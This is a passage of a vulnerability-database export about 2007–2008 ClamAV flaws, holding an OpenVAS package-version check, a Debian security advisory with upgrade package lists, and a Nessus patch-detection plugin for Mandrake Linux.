"2017-07-10T00:00:00", "published": "2009-02-17T00:00:00", "id": "OPENVAS:860037", "href": "http://plugins.openvas.org/nasl.php?oid=860037", "type": "openvas", "title": "Fedora Update for clamav FEDORA-2008-3358", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for clamav FEDORA-2008-3358\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"clamav on Fedora 7\";\ntag_insight = \"Clam AntiVirus is an anti-virus toolkit for UNIX. The main purpose of this\n software is the integration with mail servers (attachment scanning). The\n package provides a flexible and scalable multi-threaded daemon, a command\n line scanner, and a tool for automatic updating via Internet. The programs\n are based on a shared library distributed with the Clam AntiVirus package,\n which you can use with your own software. The virus database is based on\n the virus database from OpenAntiVirus, but contains additional signatures\n (including signatures for popular polymorphic viruses, too) and is KEPT UP\n TO DATE.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-April/msg00576.html\");\n script_id(860037);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-17 16:43:56 +0100 (Tue, 17 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2008-3358\");\n script_cve_id(\"CVE-2008-1100\", \"CVE-2008-1387\", \"CVE-2008-0314\", \"CVE-2008-1833\", \"CVE-2007-6335\", \"CVE-2007-4510\");\n script_name( \"Fedora Update for clamav FEDORA-2008-3358\");\n\n script_summary(\"Check for the Version of clamav\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC7\")\n{\n\n if ((res = isrpmvuln(pkg:\"clamav\", rpm:\"clamav~0.92.1~2.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2020-11-11T13:21:50", "bulletinFamily": "unix", "cvelist": ["CVE-2007-4510", "CVE-2007-4560"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1366-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nSeptember 1st, 2007 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : clamav\nVulnerability : several\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CVE-2007-4510 CVE-2007-4560\n\nSeveral remote vulnerabilities have been discovered in the Clam anti-virus\ntoolkit. The Common Vulnerabilities and Exposures project identifies the\nfollowing problems:\n\nCVE-2007-4510\n\n It was discovered that the RTF and RFC2397 parsers can be tricked\n into dereferencing a NULL pointer, resulting in denial of service.\n\nCVE-2007-4560\n\n It was discovered clamav-milter performs insufficicient input\n sanitising, resulting in the execution of arbitrary shell commands.\n\nThe oldstable distribution (sarge) is only affected by a subset of \nthe problems. An update will be provided later.\n\nFor the stable distribution (etch) these problems have been fixed\nin version 0.90.1-3etch7.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 0.91.2-1.\n\nWe recommend that you upgrade your clamav packages. \n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1-3etch7.dsc\n Size/MD5 checksum: 886 76508137da0c93a144d130323f7eca87\n http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1-3etch7.diff.gz\n Size/MD5 checksum: 203232 127d4844eb36f41a52c67d461d554c09\n http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1.orig.tar.gz\n Size/MD5 checksum: 11643310 cd11c05b5476262eaea4fa3bd7dc25bf\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/c/clamav/clamav-base_0.90.1-3etch7_all.deb\n Size/MD5 checksum: 201648 4f87137fc2d9dc12ae774ed149c11080\n http://security.debian.org/pool/updates/main/c/clamav/clamav-docs_0.90.1-3etch7_all.deb\n Size/MD5 checksum: 1003456 a2aacc240716f6da56c9cda24e288af1\n http://security.debian.org/pool/updates/main/c/clamav/clamav-testfiles_0.90.1-3etch7_all.deb\n Size/MD5 checksum: 157834 820e470f5c428c599fc174e0fcadc7ee\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1-3etch7_alpha.deb\n Size/MD5 checksum: 863492 e4bb31adae25ba8270c3a7693a5ac203\n http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1-3etch7_alpha.deb\n Size/MD5 checksum: 184710 65a6b05e5f59a1373b27524267f81f61\n http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1-3etch7_alpha.deb\n Size/MD5 checksum: 644772 fc182ead4b1858dd9e295a1e774f13c7\n http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1-3etch7_alpha.deb\n Size/MD5 checksum: 9303850 fccfb44066fd7028855dd92ac61918ca\n http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1-3etch7_alpha.deb\n Size/MD5 checksum: 180304 d34adfc21674bfd5f804f4c721aff9d5\n http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1-3etch7_alpha.deb\n Size/MD5 checksum: 511144 223b48dbd9cb9a4003a67dbba4bf265e\n http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1-3etch7_alpha.deb\n Size/MD5 checksum: 406406 6bca766fb1a86d0a58793f7f9603dd85\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1-3etch7_amd64.deb\n Size/MD5 checksum: 856522 cae033c2c4d2245ed0c3742982f9bb67\n http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1-3etch7_amd64.deb\n Size/MD5 checksum: 178452 cf29bd7447cfc3163974b60cc29955a1\n http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1-3etch7_amd64.deb\n Size/MD5 checksum: 638384 11df3244f048ed156ef97d99ddf13ee2\n http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1-3etch7_amd64.deb\n Size/MD5 checksum: 9301956 ee98e922039c3ae2e58e00fa46f3682f\n http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1-3etch7_amd64.deb\n Size/MD5 checksum: 177470 a2fc25aecce75dfd7b506bfd852110cd\n http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1-3etch7_amd64.deb\n Size/MD5 checksum: 386568 6a1f79b33c45bbf7f63361c5bc3e5301\n http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1-3etch7_amd64.deb\n Size/MD5 checksum: 367274 a313b9e7a274000923f2a4c508ce630d\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1-3etch7_arm.deb\n Size/MD5 checksum: 852934 030a5f8950c9917033dd4a73e500d177\n http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1-3etch7_arm.deb\n Size/MD5 checksum: 171200 c37973b52dbee496410dc338826c89c3\n http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1-3etch7_arm.deb\n Size/MD5 checksum: 598014 2e698cb351c2a6821e4cc4a4c4f39d48\n http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1-3etch7_arm.deb\n Size/MD5 checksum: 9299226 06ca0c49348eb0deeddac6e1b4d87378\n http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1-3etch7_arm.deb\n Size/MD5 checksum: 175344 b38253709f390f65a27363f0d41e14c7\n http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1-3etch7_arm.deb\n Size/MD5 checksum: 366618 f555885ad50c5a205bfe52bc5c05bf32\n http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1-3etch7_arm.deb\n Size/MD5 checksum: 363474 47905b28d3fa482eb2ba05c08de1f395\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1-3etch7_hppa.deb\n Size/MD5 checksum: 857242 7d921dd3dc4d8dc97c8289e6ed2dc56c\n http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1-3etch7_hppa.deb\n Size/MD5 checksum: 178162 f0e8edeadf8a35002982a166b84f5bd8\n http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1-3etch7_hppa.deb\n Size/MD5 checksum: 618354 dd56899c90c0826a029ad632fe3d784e\n http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1-3etch7_hppa.deb\n Size/MD5 checksum: 9303278 352b5455ef66f4faebf1622bba6d6abb\n http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1-3etch7_hppa.deb\n Size/MD5 checksum: 177404 1d571b923902dfeadab4c4d79485ca24\n http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1-3etch7_hppa.deb\n Size/MD5 checksum: 432894 5700bd90730816ae355bb969a3a0d726\n http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1-3etch7_hppa.deb\n Size/MD5 checksum: 405100 8e2345c87a460779a4588a51b5d3d4fa\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1-3etch7_i386.deb\n Size/MD5 checksum: 853954 9cb2105c0b125d06b6cd55c3afc034df\n http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1-3etch7_i386.deb\n Size/MD5 checksum: 174810 26e058c602e245cdd93b617a6433f3eb\n http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1-3etch7_i386.deb\n Size/MD5 checksum: 604246 9229e00e4fd2f479c4991579527dda05\n http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1-3etch7_i386.deb\n Size/MD5 checksum: 9300180 2ea193af166b258bafc507ee39fe5ed5\n http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1-3etch7_i386.deb\n Size/MD5 checksum: 175306 a9249b84ddf8381fddaefdad2d838a7e\n http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1-3etch7_i386.deb\n Size/MD5 checksum: 367860 d88bcc54abe004b0cac9dace8b1a97cb\n http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1-3etch7_i386.deb\n Size/MD5 checksum: 365930 25dfe3b0f5db7fd318f508f981447c5b\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1-3etch7_ia64.deb\n Size/MD5 checksum: 878502 6819ecbe6de1e78d7a794bd57be5242c\n http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1-3etch7_ia64.deb\n Size/MD5 checksum: 201696 b6aad73bb42bc06ebe2c7e7cf6638e8e\n http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1-3etch7_ia64.deb\n Size/MD5 checksum: 657016 a8700ddde5a27b6e5543c26b94ebaccb\n http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1-3etch7_ia64.deb\n Size/MD5 checksum: 9315332 5e70f38d3e2c545c2a3a0e886a9d31bf\n http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1-3etch7_ia64.deb\n Size/MD5 checksum: 191962 096679339d39f00c721efb8b443a4eaa\n http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1-3etch7_ia64.deb\n Size/MD5 checksum: 521666 d782256097bd91daac7c281bc5b9c04a\n http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1-3etch7_ia64.deb\n Size/MD5 checksum: 475118 9672c4a0370689ab46e98bbe4b5abdae\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1-3etch7_mips.deb\n Size/MD5 checksum: 854704 4c88a5d9a1dba0a9b1bff65a873b3088\n http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1-3etch7_mips.deb\n Size/MD5 checksum: 179932 6eddaad912a230c6b5e8d7b66503a99d\n http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1-3etch7_mips.deb\n Size/MD5 checksum: 647356 783a1e4fed71df9f0556616b54cb3a93\n http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1-3etch7_mips.deb\n Size/MD5 checksum: 9301594 fc06728c15469aace7857a24f5fc53ee\n http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1-3etch7_mips.deb\n Size/MD5 checksum: 175694 1389bf57964bee7e61a49fe148dfd06c\n http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1-3etch7_mips.deb\n Size/MD5 checksum: 435530 6ff83829f607222759f9bc74add7b77e\n http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1-3etch7_mips.deb\n Size/MD5 checksum: 372356 569d451c407c05823032836b2b44d89c\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1-3etch7_mipsel.deb\n Size/MD5 checksum: 854664 4d78fb80f34622cfabd610d707b74ed3\n http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1-3etch7_mipsel.deb\n Size/MD5 checksum: 180046 e2a0871e9171da32be01adf62ad1d128\n http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1-3etch7_mipsel.deb\n Size/MD5 checksum: 636224 2476d9168a9dc29ec7c466f87a234dbc\n http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1-3etch7_mipsel.deb\n Size/MD5 checksum: 9301726 91fbb41f97a05431b3a192b7fb1be1ab\n http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1-3etch7_mipsel.deb\n Size/MD5 checksum: 175936 bca774cbae1f58760b3e865189615238\n http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1-3etch7_mipsel.deb\n Size/MD5 checksum: 426980 282f62187b9cd468416f8fd614d4067c\n http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1-3etch7_mipsel.deb\n Size/MD5 checksum: 365596 6a7c6a9c3f466ec1af406bc5c58d8322\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1-3etch7_powerpc.deb\n Size/MD5 checksum: 857324 71e8777c0bd9373b31bafc1aa00c8be0\n http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1-3etch7_powerpc.deb\n Size/MD5 checksum: 181870 76e72290201ed98010991f3639c6a87e\n http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1-3etch7_powerpc.deb\n Size/MD5 checksum: 637432 d3d0cf8a8288a340ade551737721ddcf\n http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1-3etch7_powerpc.deb\n Size/MD5 checksum: 9302318 7574fcc75525c788c93ff3b28b214458\n http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1-3etch7_powerpc.deb\n Size/MD5 checksum: 176394 9f861a15da4a7d3d460948dce1e97037\n http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1-3etch7_powerpc.deb\n Size/MD5 checksum: 405822 f84a324e6d6101046dce37495a5fc1db\n http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1-3etch7_powerpc.deb\n Size/MD5 checksum: 378474 ec5ab7ea0b45d507ad5ffd0bdd91921b\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1-3etch7_s390.deb\n Size/MD5 checksum: 855284 451dd987867f18df691343826ae2f11f\n http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1-3etch7_s390.deb\n Size/MD5 checksum: 176424 46cc5eddcc876479e988b9e10e879f8c\n http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1-3etch7_s390.deb\n Size/MD5 checksum: 628526 2c75c9e4150a0b8eb0c6446e5d112735\n http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1-3etch7_s390.deb\n Size/MD5 checksum: 9300942 04eb856a3a44098ea1e483921e272c46\n http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1-3etch7_s390.deb\n Size/MD5 checksum: 177166 52c5cba6197a33b62c912bfddde59782\n http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1-3etch7_s390.deb\n Size/MD5 checksum: 401818 b8f39319d247f3aa8077c5cfd308185c\n http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1-3etch7_s390.deb\n Size/MD5 checksum: 391486 24119acc8394847bbde1a957449b0f15\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1-3etch7_sparc.deb\n Size/MD5 checksum: 851414 6da36840b5725d962426971f01e2419c\n http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1-3etch7_sparc.deb\n Size/MD5 checksum: 172124 0ad57992d8e2538850137a3b9580dfc0\n http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1-3etch7_sparc.deb\n Size/MD5 checksum: 584052 69fd3f5d67b2a54b1735414184f6a92c\n http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1-3etch7_sparc.deb\n Size/MD5 checksum: 9298816 2c3e7b1aa338c7fb3d04ce3807ec28bd\n http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1-3etch7_sparc.deb\n Size/MD5 checksum: 174044 16c23d0e5057d3d852e21ad226601ec2\n http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1-3etch7_sparc.deb\n Size/MD5 checksum: 389466 45e786e946ddde5fc22c9532a7169f5e\n http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1-3etch7_sparc.deb\n Size/MD5 checksum: 377484 58b6b3b0d422300d241f406f9985cfa9\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2007-09-01T00:00:00", "published": "2007-09-01T00:00:00", "id": "DEBIAN:DSA-1366-1:CBD8B", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00127.html", "title": "[SECURITY] [DSA 1366-1] New clamav packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-07T11:51:45", "description": "A vulnerability in ClamAV was discovered that could allow remote\nattackers to cause a denial of service via a crafted RTF file or a\ncrafted HTML document with a data: URI, both of which trigger a NULL\ndereference (CVE-2007-4510).\n\nA vulnerability in clamav-milter, when run in black hole mode, could\nallow remote attackers to execute arbitrary commands via shell\nmetacharacters that are used in a certain popen call (CVE-2007-4560).\n\nOther bugs have also been corrected in 0.91.2 which is being provided\nwith this update.", "edition": 25, "published": "2007-09-03T00:00:00", "title": "Mandrake Linux Security Advisory : clamav (MDKSA-2007:172)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4510", "CVE-2007-4560"], "modified": "2007-09-03T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:clamd", "p-cpe:/a:mandriva:linux:clamav", "p-cpe:/a:mandriva:linux:lib64clamav2", "cpe:/o:mandriva:linux:2007", "cpe:/o:mandriva:linux:2007.1", "p-cpe:/a:mandriva:linux:clamav-milter", "p-cpe:/a:mandriva:linux:clamav-db", "p-cpe:/a:mandriva:linux:clamdmon", "p-cpe:/a:mandriva:linux:lib64clamav-devel", "p-cpe:/a:mandriva:linux:libclamav-devel", "p-cpe:/a:mandriva:linux:libclamav2"], "id": "MANDRAKE_MDKSA-2007-172.NASL", "href": "https://www.tenable.com/plugins/nessus/25969", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2007:172. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(25969);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2007-4510\", \"CVE-2007-4560\");\n script_bugtraq_id(25398, 25439);\n script_xref(name:\"MDKSA\", value:\"2007:172\");\n\n script_name(english:\"Mandrake Linux Security Advisory : clamav (MDKSA-2007:172)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability in ClamAV was discovered that could allow remote\nattackers to cause a denial of service via a crafted RTF file or a\ncrafted HTML document with a data: URI, both of which trigger a NULL\ndereference (CVE-2007-4510).\n\nA vulnerability in clamav-milter, when run in black hole mode, could\nallow remote attackers to execute arbitrary commands via shell\nmetacharacters that are used in a certain popen call (CVE-2007-4560).\n\nOther bugs have also been corrected in 0.91.2 which is being provided\nwith this update.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ClamAV Milter Blackhole-Mode Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(78);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:clamav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:clamav-db\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:clamav-milter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:clamd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:clamdmon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64clamav-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64clamav2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libclamav-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libclamav2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/09/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2007.0\", reference:\"clamav-0.91.2-1.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"clamav-db-0.91.2-1.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"clamav-milter-0.91.2-1.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"clamd-0.91.2-1.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"clamdmon-0.91.2-1.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64clamav-devel-0.91.2-1.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64clamav2-0.91.2-1.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libclamav-devel-0.91.2-1.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libclamav2-0.91.2-1.1mdv2007.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2007.1\", reference:\"clamav-0.91.2-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"clamav-db-0.91.2-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"clamav-milter-0.91.2-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"clamd-0.91.2-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"clamdmon-0.91.2-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64clamav-devel-0.91.2-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64clamav2-0.91.2-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libclamav-devel-0.91.2-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libclamav2-0.91.2-1.1mdv2007.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:52:15", "description": "The remote host is affected by the vulnerability described in GLSA-200709-14\n(ClamAV: Multiple vulnerabilities)\n\n Nikolaos Rangos discovered a vulnerability in ClamAV which exists\n because the recipient address extracted from email messages is not\n properly sanitized before being used in a call to 'popen()' when\n executing sendmail 